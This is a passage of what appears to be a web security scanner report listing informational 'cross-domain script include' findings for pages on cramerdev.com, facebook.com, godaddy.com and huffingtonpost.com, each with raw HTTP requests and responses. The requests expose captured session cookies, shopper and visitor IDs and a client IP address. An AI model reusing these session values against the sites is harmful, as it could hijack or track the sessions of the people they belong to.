The response dynamically includes the following scripts from other domains:

Request

GET /weblog/ HTTP/1.1
Host: www.cramerdev.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Arcturus%2ESession%2ECookie%2EValue=; Arcturus%2ESession%2ECookie=; MarkupFactory%5FInstallation%5FHandle=cramerdev; ASPSESSIONIDAAACSQCR=FFBDMJECFMGHLGCDAMPIOKHD; __utmz=257688281.1301081104.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=257688281.681488014.1301081104.1301081104.1301081104.1; __utmc=257688281; __utmb=257688281.2.10.1301081104

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: Arcturus%2ESession%2ECookie=; path=/
Set-Cookie: Arcturus%2ESession%2ECookie%2EValue=; path=/
X-Powered-By: Markup Factory
Date: Fri, 25 Mar 2011 19:25:10 GMT
Content-Length: 8074

<!DOCTYPE html>

<html>

<head>

<meta http-equiv="content-type" content="text/html; charset=utf-8" />

<link rel="stylesheet" type="text/css" media="screen" href="/assets/cramerdev/960.css" />

...[SNIP]...
<meta name="description" content="" />


<script src="http://use.typekit.com/lvr1wgh.js"></script>
...[SNIP]...
<!-- close .footer -->

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
21.36. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-Reports%2F133167183399602&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Daolnews.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.aolnews.com%252F2011%252F03%252F24%252Fcaseworkers-charged-in-death-of-marchella-brett-pierce-abused-4%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.96.49
X-Cnection: close
Date: Sat, 26 Mar 2011 12:22:26 GMT
Content-Length: 8259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/05jN5JkiQIj.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/jDl2O6ZuAyq.js"></script>
...[SNIP]...
21.37. https://www.godaddy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?isc=GPASH002 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageTwo; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:21 GMT
Content-Length: 250092


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<body id="ctl00_PageBody" style="width:100%;margin:0;">
   
<script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!--HEADERBEGIN-->

<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110203.min.js"></script>
...[SNIP]...
</style>

<script src="https://img3.wsimg.com/fos/script/QuickBuyInsert8.min.js" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="https://img3.wsimg.com/fos/script/atlantis_jquery8.min.js" type="text/javascript"></script>
...[SNIP]...
<div id="bottomPod02" style="width:1000px;height:192px;padding: 5px 0px 4px 0px;">

<script src="https://img3.wsimg.com/fos/script/ProductAdvisor5.min.js" type="text/javascript"></script>
...[SNIP]...
<div class="PodContainer">


<script src="https://img3.wsimg.com/fos/script/ViewExtensionsInsert7.min.js" type="text/javascript"></script>

<script src="https://img3.wsimg.com/fos/script/jquery.tablesorter.min.js" type="text/javascript"></script>
...[SNIP]...
</div>
       

<script src="https://img3.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1" type="text/javascript"></script>


<script src="https://img3.wsimg.com/fos/script/sales14.min.js" type="text/javascript"></script>
...[SNIP]...
21.38. https://www.godaddy.com/Hosting/web-hosting.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /Hosting/web-hosting.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Hosting/web-hosting.aspx?ci=13891&isc=gpash016 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne; serverVersion=A; domainYardVal=%2D1; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Hosting/web-hosting.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=ci=13891&isc=gpash016%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash016&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:30 GMT
Content-Length: 161114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<body id="ctl00_PageBody" style="width:100%;margin:0;">
   
<script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!--HEADERBEGIN-->

<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110203.min.js"></script>
...[SNIP]...
</div>
       

<script src="https://img3.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1" type="text/javascript"></script>


<script src="https://img3.wsimg.com/fos/script/sales14.min.js" type="text/javascript"></script>
   

<script src="https://img3.wsimg.com/fos/script/atlantis_jquery8.min.js" type="text/javascript"></script>
...[SNIP]...
21.39. https://www.godaddy.com/catalog.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /catalog.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /catalog.aspx?isc=GPASH009&se=%2B&ci=287 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/catalog.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH009&se=%2b&ci=287%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH009&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:35 GMT
Content-Length: 108151


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<body id="ctl00_PageBody" style="width:100%;margin:0;">
   
<script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!--HEADERBEGIN-->

<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110203.min.js"></script>
...[SNIP]...
</div>
       

<script src="https://img3.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1" type="text/javascript"></script>


<script src="https://img3.wsimg.com/fos/script/sales14.min.js" type="text/javascript"></script>
...[SNIP]...
21.40. https://www.godaddy.com/domains/search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /domains/search.aspx?isc=gpash003 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=gpash003%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash003&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=dbegbbdjagnaejceielbzacgmhtcefba; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:34 GMT
Content-Length: 210017


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<body id="ctl00_PageBody" style="width:100%;margin:0;">
   
<script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!--HEADERBEGIN-->

<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110203.min.js"></script>
...[SNIP]...
</div>
       

<script src="https://img3.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1" type="text/javascript"></script>


<script src="https://img3.wsimg.com/fos/script/sales14.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="https://img3.wsimg.com/fos/script/atlantis_jquery8.js" type="text/javascript"></script>
...[SNIP]...
21.41. https://www.godaddy.com/gdshop/hosting/landing.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /gdshop/hosting/landing.asp?isc=gpash016 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: traffic=server=M1PWCORPWEB123&sitename=www%2Egodaddy%2Ecom&referringdomain=&referringpath=&shopper=42533607&querystring=isc%3Dgpash016&isc=gpash016&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1&split=68; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:26 GMT
Content-Length: 246275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<body bgcolor="#FFFFFF" topmargin="0" leftmargin="0" marginheight="0" marginwidth="0" style="text-align:left; margin:0;">
<script src="https://imagesak.securepaynet.net/AtlantisScripts/jquery/jquery-1.3.1.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- BEGIN HEADER -->
<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110203.min.js"></script>
...[SNIP]...
<link rel="stylesheet" href="https://imagesak.securepaynet.net/js/mocha/css/ui.css" type="text/css" />
<script type="text/javascript" src="https://imagesak.securepaynet.net/js/mocha/scripts/mootools-1.2-core.js"></script>
<script type="text/javascript" src="https://imagesak.securepaynet.net/js/mocha/scripts/mootools-1.2-more.js"></script>
<script type="text/javascript" src="https://imagesak.securepaynet.net/js/mocha/scripts/excanvas-compressed.js"></script>
<script type="text/javascript" src="https://imagesak.securepaynet.net/js/mocha/scripts/mocha-9a.5.js" charset="utf-8"></script>
...[SNIP]...
21.42. https://www.godaddy.com/hosting/website-builder.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /hosting/website-builder.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hosting/website-builder.aspx?app%5Fhdr=&isc=gpash017 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:31 GMT
Content-Length: 139715


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<body id="ctl00_PageBody" style="width:100%;margin:0;">
   
<script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!--HEADERBEGIN-->

<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110203.min.js"></script>
...[SNIP]...
</div>
       

<script src="https://img3.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1" type="text/javascript"></script>


<script src="https://img3.wsimg.com/fos/script/sales14.min.js" type="text/javascript"></script>
   

<script src="https://img3.wsimg.com/fos/script/atlantis_jquery8.min.js" type="text/javascript"></script>
...[SNIP]...
21.43. http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/03/26/geraldine-ferraro-dead-dies_n_840995.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/03/26/geraldine-ferraro-dead-dies_n_840995.html HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1300987757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1364029523-1300987777508; s_pers=%20s_getnr%3D1300989830624-New%7C1364061830624%3B%20s_nrgvo%3DNew%7C1364061830626%3B; __utma=265287574.492257335.1300987757.1300987757.1300987757.1; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __qseg=Q_D|Q_T|Q_2687|Q_2685|Q_2402|Q_1910|Q_1908|Q_1905|Q_1592|Q_683|Q_682|Q_680|Q_679|Q_678|Q_677|Q_676|Q_666|Q_665|Q_660|Q_657

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 20:36:02 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 290906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=print-view.css" type="text/css" media="print" />
   
               
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

    <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Chuff_promo.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Capp-feeds.js%2Chptwitter.js%2Csitemode.js&amp;v44499"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/tw_dfp_adsonar.js"></script>
...[SNIP]...
<!-- CommentsV3 -->
<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&amp;v44388"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/tw_dfp_adsonar.js"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...
21.44. http://www.huffingtonpost.com/permalink-tracker.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /permalink-tracker.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /permalink-tracker.html?vertical=politics HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
